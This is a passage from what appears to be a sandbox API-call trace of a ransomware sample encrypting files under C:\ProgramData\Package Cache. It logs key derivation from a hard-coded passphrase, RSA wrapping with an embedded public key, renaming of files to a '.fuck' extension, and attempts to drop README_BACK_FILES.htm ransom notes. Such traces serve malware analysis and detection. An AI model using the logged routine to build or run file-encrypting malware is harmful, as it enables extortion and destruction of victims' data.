pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9e074*=0x10) returned 1 [0238.242] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9e074, lpOverlapped=0x0) returned 0 [0238.242] CloseHandle (hObject=0xffffffff) returned 1 [0238.242] CloseHandle (hObject=0xffffffff) returned 1 [0238.242] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), bFailIfExists=0) returned 0 [0238.243] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm", dwFileAttributes=0x0) returned 0 [0238.243] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.gsg")) returned 0 [0238.243] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.fuck" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.fuck")) returned 0 [0238.243] CryptDestroyHash (hHash=0x27ead50) returned 1 [0238.243] CryptDestroyKey (hKey=0x27ead90) returned 1 [0238.243] CryptReleaseContext (hProv=0x285b928, dwFlags=0x0) returned 1 [0238.243] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.243] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.244] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.244] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\readme_back_files.htm")) returned 0xffffffff [0238.244] AreFileApisANSI () returned 1 [0238.244] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2856f28, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91 [0238.244] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.244] GetLastError () returned 0x5 [0238.244] GetLastError () returned 0x5 [0238.244] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 1 [0238.244] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\*.*", lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0x27eacd0 [0238.244] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.244] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0238.245] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x27eac90 [0238.245] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.245] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0238.245] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x27ead50 [0238.246] FindNextFileA (in: hFindFile=0x27ead50, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.246] FindNextFileA (in: hFindFile=0x27ead50, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.246] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.246] GetLastError () returned 0x5 [0238.246] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab")) returned 0x20 [0238.246] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x80) returned 0 [0238.246] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.247] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.247] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg", dwFileAttributes=0x2) returned 0 [0238.247] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285bce0) returned 1 [0238.249] CryptCreateHash (in: hProv=0x285bce0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.249] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.249] CryptHashData (hHash=0x27ead90, pbData=0x2ec800, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.249] CryptDeriveKey (in: hProv=0x285bce0, Algid=0x6610, hBaseData=0x27ead90, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27ea8d0) returned 1 [0238.249] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.249] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.249] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285b570) returned 1 [0238.250] CryptImportPublicKeyInfo (in: hCryptProv=0x285b570, dwCertEncodingType=0x1, pInfo=0x286b268*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286b298*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286b2a0*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27eaf90) returned 1 [0238.250] CryptEncrypt (in: hKey=0x27eaf90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.250] CryptEncrypt (in: hKey=0x27eaf90, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b928*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285b928*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.250] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b928, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.250] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.250] CryptEncrypt (in: hKey=0x27ea8d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.250] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.250] CloseHandle (hObject=0xffffffff) returned 1 [0238.250] CloseHandle (hObject=0xffffffff) returned 1 [0238.250] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), bFailIfExists=0) returned 0 [0238.251] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab", dwFileAttributes=0x0) returned 0 [0238.251] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.gsg" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.gsg")) returned 0 [0238.251] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\cab1.cab.fuck" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\cab1.cab.fuck")) returned 0 [0238.251] CryptDestroyHash (hHash=0x27ead90) returned 1 [0238.251] CryptDestroyKey (hKey=0x27ea8d0) returned 1 [0238.251] CryptReleaseContext (hProv=0x285bce0, dwFlags=0x0) returned 1 [0238.252] FindNextFileA (in: hFindFile=0x27ead50, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0238.252] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0238.252] GetLastError () returned 0x5 [0238.252] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi")) returned 0x20 [0238.253] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x80) returned 0 [0238.253] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.253] CreateFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.253] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg", dwFileAttributes=0x2) returned 0 [0238.254] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x285bc58) returned 1 [0238.256] CryptCreateHash (in: hProv=0x285bc58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0238.256] lstrlenA (lpString="GASinrxNGZdGxepxtSAFGoQZzMlQm") returned 29 [0238.256] CryptHashData (hHash=0x27ea810, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0238.256] CryptDeriveKey (in: hProv=0x285bc58, Algid=0x6610, hBaseData=0x27ea810, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x27eaf50) returned 1 [0238.256] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----t", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0238.256] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0238.256] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x285b2c8) returned 1 [0238.257] CryptImportPublicKeyInfo (in: hCryptProv=0x285b2c8, dwCertEncodingType=0x1, pInfo=0x286ae58*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x286ae88*, PublicKey.cbData=0x8c, PublicKey.pbData=0x286ae90*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x27ea850) returned 1 [0238.257] CryptEncrypt (in: hKey=0x27ea850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0238.257] CryptEncrypt (in: hKey=0x27ea850, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x285b240*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x285b240*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0238.257] WriteFile (in: hFile=0xffffffff, lpBuffer=0x285b240, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.257] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0238.257] CryptEncrypt (in: hKey=0x27eaf50, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0238.257] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0238.257] CloseHandle (hObject=0xffffffff) returned 1 [0238.257] CloseHandle (hObject=0xffffffff) returned 1 [0238.257] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), bFailIfExists=0) returned 0 [0238.258] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi", dwFileAttributes=0x0) returned 0 [0238.258] DeleteFileA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.gsg" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.gsg")) returned 0 [0238.258] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi"), lpNewFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\vc_runtimeAdditional_x86.msi.fuck" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\vc_runtimeadditional_x86.msi.fuck")) returned 0 [0238.258] CryptDestroyHash (hHash=0x27ea810) returned 1 [0238.258] CryptDestroyKey (hKey=0x27eaf50) returned 1 [0238.258] CryptReleaseContext (hProv=0x285bc58, dwFlags=0x0) returned 1 [0238.258] FindNextFileA (in: hFindFile=0x27ead50, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0238.258] FindClose (in: hFindFile=0x27ead50 | out: hFindFile=0x27ead50) returned 1 [0238.259] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\readme_back_files.htm")) returned 0xffffffff [0238.259] AreFileApisANSI () returned 1 [0238.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x286d6e0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 135 [0238.259] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\vcRuntimeAdditional_x86\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\vcruntimeadditional_x86\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.259] GetLastError () returned 0x5 [0238.259] GetLastError () returned 0x5 [0238.259] FindNextFileA (in: hFindFile=0x27eac90, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0238.259] FindClose (in: hFindFile=0x27eac90 | out: hFindFile=0x27eac90) returned 1 [0238.259] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\readme_back_files.htm")) returned 0xffffffff [0238.259] AreFileApisANSI () returned 1 [0238.259] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 111 [0238.259] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\packages\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\packages\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.260] GetLastError () returned 0x5 [0238.260] GetLastError () returned 0x5 [0238.260] FindNextFileA (in: hFindFile=0x27eacd0, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 0 [0238.260] FindClose (in: hFindFile=0x27eacd0 | out: hFindFile=0x27eacd0) returned 1 [0238.260] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\readme_back_files.htm")) returned 0xffffffff [0238.260] AreFileApisANSI () returned 1 [0238.260] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 102 [0238.260] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}v12.0.21005\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\{f8cfeb22-a2e7-3971-9eda-4b11edefc185}v12.0.21005\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f2e4, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.260] GetLastError () returned 0x5 [0238.260] GetLastError () returned 0x5 [0238.260] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9f4fc | out: lpFindFileData=0x2b9f4fc) returned 0 [0238.261] FindClose (in: hFindFile=0x28463e0 | out: hFindFile=0x28463e0) returned 1 [0238.261] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Package Cache\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\readme_back_files.htm")) returned 0xffffffff [0238.261] AreFileApisANSI () returned 1 [0238.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cd4a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 52 [0238.261] CreateFileW (lpFileName="C:\\\\ProgramData\\Package Cache\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\package cache\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9f680, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0238.262] GetLastError () returned 0x5 [0238.262] GetLastError () returned 